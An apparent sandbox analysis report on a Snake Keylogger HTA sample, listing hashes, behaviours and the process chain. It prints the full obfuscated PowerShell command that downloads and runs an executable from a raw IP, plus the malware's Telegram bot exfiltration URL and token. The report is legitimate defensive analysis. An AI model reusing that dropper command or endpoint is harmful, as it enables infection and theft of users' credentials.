Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
17-10-2024 12:23
Static task
static1
Behavioral task
behavioral1
Sample
wethinkaboutthegreatsolutionforgreat.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
wethinkaboutthegreatsolutionforgreat.hta
Resource
win10v2004-20241007-en
General
-
Target
wethinkaboutthegreatsolutionforgreat.hta
-
Size
129KB
-
MD5
7a368478a9772fc6e87e8eda7ec7f7b3
-
SHA1
237eff7ffb66ca9507fdbd5512506ef4cf81a22d
-
SHA256
7e041a3670abd581eb735dab3a66975fafd7e921bb0f94a36b98829248462f8b
-
SHA512
114aa191194efec173adc3ab137eab58454854efa5109da30364b54108a74ccf68b66c659a9609ece5933aa72ab5997f7b93e510e37a51ebed51d903cbc4fe17
-
SSDEEP
96:Eam73EjaILjaeRVfr+ZqTF1OF3ja3jalHjaj7T:Ea23EuauoVj+IGu3u1uPT
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot7913958792:AAFOhfKo5L7M50XG6odxxQQwJAeD3zGEuJU/sendMessage?chat_id=7004340450
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 3 IoCs
resource yara_rule behavioral1/memory/1880-34-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/1880-35-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/1880-36-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2812 POWERShELl.ExE -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 2812 POWERShELl.ExE 2804 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2044 taskhostws.exe -
Loads dropped DLL 1 IoCs
pid Process 2812 POWERShELl.ExE -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000a0000000174bf-26.dat autoit_exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2044 set thread context of 1880 2044 taskhostws.exe 37 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskhostws.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language POWERShELl.ExE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2812 POWERShELl.ExE 2804 powershell.exe 2812 POWERShELl.ExE 2812 POWERShELl.ExE 1880 RegSvcs.exe 1880 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2044 taskhostws.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2812 POWERShELl.ExE Token: SeDebugPrivilege 2804 powershell.exe Token: SeDebugPrivilege 1880 RegSvcs.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2044 taskhostws.exe 2044 taskhostws.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 2044 taskhostws.exe 2044 taskhostws.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2780 wrote to memory of 2812 2780 mshta.exe 30 PID 2780 wrote to memory of 2812 2780 mshta.exe 30 PID 2780 wrote to memory of 2812 2780 mshta.exe 30 PID 2780 wrote to memory of 2812 2780 mshta.exe 30 PID 2812 wrote to memory of 2804 2812 POWERShELl.ExE 32 PID 2812 wrote to memory of 2804 2812 POWERShELl.ExE 32 PID 2812 wrote to memory of 2804 2812 POWERShELl.ExE 32 PID 2812 wrote to memory of 2804 2812 POWERShELl.ExE 32 PID 2812 wrote to memory of 2624 2812 POWERShELl.ExE 33 PID 2812 wrote to memory of 2624 2812 POWERShELl.ExE 33 PID 2812 wrote to memory of 2624 2812 POWERShELl.ExE 33 PID 2812 wrote to memory of 2624 2812 POWERShELl.ExE 33 PID 2624 wrote to memory of 2256 2624 csc.exe 34 PID 2624 wrote to memory of 2256 2624 csc.exe 34 PID 2624 wrote to memory of 2256 2624 csc.exe 34 PID 2624 wrote to memory of 2256 2624 csc.exe 34 PID 2812 wrote to memory of 2044 2812 POWERShELl.ExE 36 PID 2812 wrote to memory of 2044 2812 POWERShELl.ExE 36 PID 2812 wrote to memory of 2044 2812 POWERShELl.ExE 36 PID 2812 wrote to memory of 2044 2812 POWERShELl.ExE 36 PID 2044 wrote to memory of 1880 2044 taskhostws.exe 37 PID 2044 wrote to memory of 1880 2044 taskhostws.exe 37 PID 2044 wrote to memory of 1880 2044 taskhostws.exe 37 PID 2044 wrote to memory of 1880 2044 taskhostws.exe 37 PID 2044 wrote to memory of 1880 2044 taskhostws.exe 37 PID 2044 wrote to memory of 1880 2044 taskhostws.exe 37 PID 2044 wrote to memory of 1880 2044 taskhostws.exe 37 PID 2044 wrote to memory of 1880 2044 taskhostws.exe 37 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\wethinkaboutthegreatsolutionforgreat.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\SysWOW64\WINdOWspoWeRsHELL\V1.0\POWERShELl.ExE"C:\Windows\SYSTeM32\WINdOWspoWeRsHELL\V1.0\POWERShELl.ExE" "PoWErsHElL -ex bYPass -nop -W 1 -c DEViCEcrEDEntiALDepLOYMEnT ; Iex($(ieX('[sYStEm.tExT.eNcodiNg]'+[char]0X3A+[char]0X3A+'UtF8.GeTstriNG([SySteM.coNverT]'+[chAr]58+[Char]58+'FROmBaSe64STring('+[CHaR]34+'JEdDeWxIWDRPdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CZVJERUZJTkl0SU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQVCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhGeExZSG5NUUosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0b3csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3llUixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeFJ6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImloRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR0N5bEhYNE91OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMjUvMzAyL3Rhc2tob3N0d3MuZXhlIiwiJGVOdjpBUFBEQVRBXHRhc2tob3N0d3MuZXhlIiwwLDApO1NUQVJ0LVNsZWVwKDMpO3NUYVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHRhc2tob3N0d3MuZXhlIg=='+[chaR]0x22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex bYPass -nop -W 1 -c DEViCEcrEDEntiALDepLOYMEnT3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5m13dxof.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF5E4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF5D4.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:2256
-
-
-
C:\Users\Admin\AppData\Roaming\taskhostws.exe"C:\Users\Admin\AppData\Roaming\taskhostws.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\taskhostws.exe"4⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1880
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD50cf76568dadfefbb0c1e4cfd8fca5b49
SHA1930830e6687448aaee50d2d215f24b2a16148552
SHA256f8d335fcbf9558ff5ee7c878c3a113d1087e8b4ffe08a1500613a9152c057142
SHA512c6764cf9eaeda5c9288a9ba53b3c3052830cf60335799ee8fcb8e3ce787f5f71ab0bc30d3da9021891738004d5c584adbb54bceee136cd7f4bdd3bd7bd07ba9b
-
Filesize
7KB
MD58eab07f53d94073a46e3f06a7fd39a34
SHA1984c4eeef449abfa446f2aa317bcd57cb2b9e583
SHA256db14b1fe7bd042256328f3ee3c3e94d0c0916089bbe5592b848dbee3612cfaeb
SHA512adc0b75bbf1110caf025e7e7c8e0cf15b77fb06729a53755414e0e9e73f74ea82e1d074627a6ce5c04aa3e9f98cff47d5c2874ef1017aa12ea471825d7dcf57e
-
Filesize
1KB
MD586ea811e6931f0600efa5a75b73e27a9
SHA15096344062a6d36b919035153736e420405b2eec
SHA256da4e0ca9a542804d238592e83c13d199516a40921188a16e847728d35164b662
SHA512e054b229d6af1f7986815efd0ae26e566ad9f9ceb765f2d78396c03b7b486ed16923a2e43b21d574574303e946ef0bab038572e87ba97488ae8ea10d3acd8f01
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD56085be2c24c443d93e96b1d0f657ec34
SHA1195929fab117f2320166fe9178dcd92432f344df
SHA256184221735cfdbd418ec9e5113dfb88c1c04a23ba8e3806c844bd35af50a20e64
SHA512849058cfee01fd8aa06ca0c8c6f33ef97b0df34d018e929c17c3a608ef28a42e7c1c16f16422f947ba966ac393930f974af75f493cd780e1b339fdfddfaec09f
-
Filesize
938KB
MD5b47e4f366b08fe509c2a8f9ee7251f51
SHA13338dd3e335d1e8e6ee0d4c0c607248d333c25c1
SHA25603461c2a07431aed5ff68bbcf42d7ef82f32190b44ba140befd3f474614b5f3d
SHA512277032b371ca4992657c172995186b4593197a91c784e84b1b5652478d462b84792e8b10480ecf0eb05e4ce4130575c59f0f14d197d4e0d77c70c0bd6989aaec
-
Filesize
460B
MD57d449c3b022ff885a410d7d58f117516
SHA15a4642c0a7a8745d9aad5243fa3dbdfa42fcd01c
SHA256d82eab2c4860d52330cd6aefa6051d4b53566de18f6665b1140d59d79fd436e5
SHA5123683fb94132803f56fbb7188f51c097c59a4c2297cd66e88571836d4b040ae8b15cafee7f2ce747f1cc8326a8144b4e0c262bd954211adc9d65c70f9e8c645d3
-
Filesize
309B
MD55d154e184f893d69cf6da6f677c32a05
SHA14865ee0c2b2559d32e8b9926c8b06ab6d2ca81f2
SHA256ac3716f84f903788af05ca839c15bc352dc26032c73bf53facb7b7711287e7a9
SHA5120524a4214aeae19b7cdcca31350267f071349b9c7438a492fa866222d9eaafd479ed2d44abffc2d223761d1c2ede27ffa84f1a67ae8c06267c1fac09e00b5f15
-
Filesize
652B
MD5e10feae979444bf34c133e4cdeadfd13
SHA1f48f8d4660ee76deb2c2eb994a64d729fd09a2b9
SHA256593471bdb3c27ad9a44dc23f93d29002db5a85e38c2b1910d3b71b1649072567
SHA512ca7206519331eec58b309d14bb2a65d7b8e965fef2858411fbd6a4ebc9e8f0449eb2d4aa065d5143f5038aac66c20fb878a503a491c21ac401fb164cca1c13dd